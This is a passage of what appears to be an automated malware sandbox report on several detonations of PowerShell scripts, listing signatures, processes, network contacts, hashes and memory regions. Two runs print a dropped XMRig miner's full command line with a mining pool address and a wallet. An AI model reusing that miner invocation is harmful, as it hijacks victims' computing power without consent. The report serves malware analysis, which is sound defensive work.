memory/2872-63-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-64-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-65-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-66-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-67-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-68-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-69-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-70-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-71-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-72-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-73-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-74-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-75-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-76-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-77-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-78-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-79-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-80-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-81-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-82-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-83-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-84-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-85-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-86-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-87-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-88-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-89-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-90-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-91-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-92-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-93-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-94-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-95-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-96-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-97-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-98-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-99-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-100-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-101-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-102-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-103-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-104-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-105-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-106-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-107-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-108-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-109-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-110-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-111-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-112-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-113-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-114-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-115-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-116-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-117-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
memory/2872-118-0x00007FF6900B0000-0x00007FF690CE3000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:20
Platform
win7-20231129-en
Max time kernel
1559s
Max time network
1560s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
Files
memory/1988-4-0x000007FEF534E000-0x000007FEF534F000-memory.dmp
memory/1988-6-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/1988-7-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-5-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/1988-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-9-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-10-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-11-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 10:00
Platform
win7-20240611-en
Max time kernel
1561s
Max time network
1562s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
Files
memory/2296-4-0x000007FEF583E000-0x000007FEF583F000-memory.dmp
memory/2296-5-0x000000001B570000-0x000000001B852000-memory.dmp
memory/2296-6-0x0000000002960000-0x0000000002968000-memory.dmp
memory/2296-7-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp
memory/2296-8-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp
memory/2296-9-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp
memory/2296-10-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp
memory/2296-11-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp
memory/2296-12-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:48
Platform
win11-20240611-en
Max time kernel
1798s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4920 wrote to memory of 4900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4920 wrote to memory of 4900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.227.14:443 | tcp |
Files
memory/4920-0-0x00007FF8519F3000-0x00007FF8519F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5ftihad.czm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4920-9-0x000001733B6D0000-0x000001733B6F2000-memory.dmp
memory/4920-10-0x00007FF8519F0000-0x00007FF8524B2000-memory.dmp
memory/4920-11-0x00007FF8519F0000-0x00007FF8524B2000-memory.dmp
memory/4920-12-0x00007FF8519F0000-0x00007FF8524B2000-memory.dmp
memory/4920-14-0x000001733B770000-0x000001733B782000-memory.dmp
memory/4920-15-0x000001733B760000-0x000001733B76A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4900-46-0x0000020D18D80000-0x0000020D18DA0000-memory.dmp
memory/4900-47-0x0000020D18DC0000-0x0000020D18DE0000-memory.dmp
memory/4900-48-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4920-49-0x00007FF8519F3000-0x00007FF8519F5000-memory.dmp
memory/4920-50-0x00007FF8519F0000-0x00007FF8524B2000-memory.dmp
memory/4900-52-0x0000020D18E00000-0x0000020D18E20000-memory.dmp
memory/4900-51-0x0000020D18DE0000-0x0000020D18E00000-memory.dmp
memory/4900-53-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-54-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-57-0x0000020D18E00000-0x0000020D18E20000-memory.dmp
memory/4900-56-0x0000020D18DE0000-0x0000020D18E00000-memory.dmp
memory/4900-55-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-58-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-59-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-60-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-61-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-62-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-63-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-64-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-65-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-66-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-67-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-68-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-69-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-70-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-71-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-72-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-73-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-74-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-75-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-76-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-77-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-78-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-79-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-80-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-81-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-82-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-83-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-84-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-85-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-86-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-87-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-88-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-89-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-90-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-91-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-92-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-93-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-94-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-95-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-96-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-97-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-98-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-99-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-100-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-101-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-102-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-103-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-104-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-105-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-106-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-107-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-108-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-109-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-110-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-111-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-112-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-113-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-114-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-115-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
memory/4900-116-0x00007FF6EDF30000-0x00007FF6EEB63000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:59
Platform
win11-20240611-en
Max time kernel
1790s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1204 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1204 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1204-0-0x00007FFEBDC93000-0x00007FFEBDC95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ciytg2qu.n4o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1204-9-0x0000014C78C90000-0x0000014C78CB2000-memory.dmp
memory/1204-10-0x00007FFEBDC90000-0x00007FFEBE752000-memory.dmp
memory/1204-11-0x00007FFEBDC90000-0x00007FFEBE752000-memory.dmp
memory/1204-12-0x00007FFEBDC90000-0x00007FFEBE752000-memory.dmp
memory/1204-14-0x0000014C78D20000-0x0000014C78D32000-memory.dmp
memory/1204-15-0x0000014C78D10000-0x0000014C78D1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/796-46-0x0000018E29E20000-0x0000018E29E40000-memory.dmp
memory/796-47-0x0000018E29E60000-0x0000018E29E80000-memory.dmp
memory/796-48-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/1204-49-0x00007FFEBDC90000-0x00007FFEBE752000-memory.dmp
memory/1204-51-0x00007FFEBDC93000-0x00007FFEBDC95000-memory.dmp
memory/796-50-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-54-0x0000018E29E80000-0x0000018E29EA0000-memory.dmp
memory/796-53-0x0000018EBC510000-0x0000018EBC530000-memory.dmp
memory/1204-52-0x00007FFEBDC90000-0x00007FFEBE752000-memory.dmp
memory/796-55-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-56-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-58-0x0000018E29E80000-0x0000018E29EA0000-memory.dmp
memory/796-57-0x0000018EBC510000-0x0000018EBC530000-memory.dmp
memory/796-59-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-60-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-61-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-62-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-63-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-64-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-65-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-66-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-67-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-68-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-69-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-70-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-71-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-72-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-73-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-74-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-75-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-76-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-77-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-78-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-79-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-80-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
memory/796-81-0x00007FF72D2E0000-0x00007FF72DF13000-memory.dmp
